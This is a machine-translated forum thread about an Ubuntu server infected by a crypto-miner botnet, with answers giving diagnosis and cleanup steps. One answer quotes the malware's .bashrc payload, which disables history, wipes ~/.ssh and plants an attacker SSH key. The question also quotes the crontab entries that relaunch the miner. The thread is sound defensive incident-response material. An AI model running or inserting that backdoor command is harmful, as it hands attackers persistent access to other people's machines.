奇怪的 Cron Job 占用了 Ubuntu 18 LTS 服务器 100% 的 CPU

tag-icon tag-icon server cron rsync
奇怪的 Cron Job 占用了 Ubuntu 18 LTS 服务器 100% 的 CPU

我不断收到 weir cron 作业,但我不知道它们在做什么。我通常发出 kill -9 来停止它们。它们占用了我 100% 的 CPU,并且可以运行数天,直到我检查为止。有人知道这是什么意思吗?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

我正在运行 Ubuntu 18 LTS 服务器,截至昨天 2019 年 7 月 24 日,该服务器已完全更新

更新

我很感谢大家的反馈。我已经断开了所有数据和应用程序驱动器,因为唯一受到影响的是操作系统驱动器,至少我做得很正确。我打算进行彻底重建,使用更安全和更安全的方法。

答案1

您的机器很可能感染了加密矿工。您可以看到其他人报告了类似的文件名和行为使用安全中心对 Azure 中的虚拟机进行实际检测。 也可以看看我的 Ubuntu 服务器感染了病毒...我找到了它,但我无法清除它...在 Reddit 上。

您不再信任该机器,应重新安装。恢复备份时请小心谨慎。

答案2

您的机器已感染加密矿工攻击。我过去也曾面临过类似的勒索软件攻击,我的数据库遭到了入侵。我对机器进行了 SQL 转储并重新配置了机器(因为我的机器是托管在 AWS EC2 上的 VM)。我还修改了机器的安全组以锁定 SSH 访问和修改密码。我还启用了日志记录以记录查询并将其每晚导出到 S3。

答案3

我也有同样的情况,昨天才注意到。我检查了文件/var/log/syslog,这个 IP(185.234.218.40)似乎正在自动执行 cronjobs。

我检查过了http://whatismyipaddress.comhttps://whatismyipaddress.com/ip/185.234.218.40),并有一些报告。这些文件被该木马编辑过:

  • .bashrc
  • .ssh/授权密钥

我在末尾发现了这一点.bashrc(每次打开 bash 时都会执行):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

它会删除你的authorized_keys文件,该文件是允许无需密码连接的 SSH 密钥列表。然后,它会添加攻击者的 SSH 密钥:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

此外,我还发现了这个文件夹:/tmp/.X13-unix/.rsync,里面有所有的恶意软件。我甚至还发现了一个文件,,/tmp/.X13-unix/.rsync/c/ip里面有 70 000 个 IP 地址,这些地址很可能是其他受害者或节点服务器。

有2个解决方案:A:

  • 添加防火墙,阻止除端口 22 和其他你认为必要的端口之外的所有传出连接,并启用 fail2ban,这是一个在 X 次密码尝试失败后禁止 IP 地址的程序

  • 终止所有 cron 作业: ps aux | grep cron,然后终止出现的 PID

  • 将密码更改为安全密码

乙:

  • 备份您需要或想要的任何文件或文件夹

  • 重置服务器并重新安装Ubuntu,或者直接创建一个新的droplet

    就像 Thom Wiggers 所说的那样,你肯定是比特币挖矿僵尸网络的一部分,而且你的服务器有后门。后门利用了 perl 漏洞,文件位于此处:/tmp/.X13-unix/.rsync/b/run,包含以下内容(https://pastebin.com/ceP2jsUy

我发现最可疑的文件夹是:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc(已编辑)

  • ~/.firefoxcatche

最后,这里有一篇与 Perl 后门相关的文章: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

希望这个对你有帮助。

答案4

昨天我也遇到了同样的情况。PC 风扇意外启动,我发现一个名为 ./kswapd0 的命令消耗了 60% 的 CPU 资源。该进程属于临时普通用户,与交换无关;它可能是恶意软件。我的初始步骤是:

  • 在互联网上搜索命令行“./kswapd0”
    • 发现许多答案建议关闭交换
    • 不适用,因为该系统不使用交换
  • 终止有问题的进程
  • 更改用户密码
  • 隔离受影响用户拥有的所有文件,将其移动到新目录并进行故障排除
    • 检查临时用户自感染以来创建的其他文件
    • 继续检查文件系统中自那时以来创建的所有文件
  • 删除受影响的用户:sudo userdel testuser
    • 通过消息观察失败情况userdel: user testuser is currently used by process <pid>
    • 列出该过程的详细信息:ps -l <pid>
      • 观察结果中的命令行:/lib/systemd/systemd --user
    • 列出与受影响用户相关的 systemd 单元:sudo systemctl | grep testuser
      • 观察带有会话名称的打印输出:session-<sn>.scope
    • 检查会话状态:sudo systemctl status session-<sn>.scope
      • 观察子进程命名rsync
    • 停止受影响用户下运行的所有进程:sudo killall -u testuser
    • 停止为受影响的用户打开的会话:sudo systemctl stop session-<sn>.scope
      • 观察会议圆满闭幕testuser
    • 重新尝试删除用户:sudo userdel testuser
      • 观察成功移除testuser

正是植入的 ssh 授权密钥中令人讨厌的注释词,让我找到了非常有用的答案https://askubuntu.com/a/1162138/848863以上。我还找到了除“.*catche”之外的所有文件和目录;感谢您的确认。一句脏话和一个拼写错误就足以说明这是在搞鬼。

此次入侵是由于内部测试时猜测错误选择的弱密码而发生的,这是出乎意料的。

幸运的是,损害似乎仅限于临时测试用户的足迹。我没有注意到任何系统日志或文件的清除,但会继续关注。

相关内容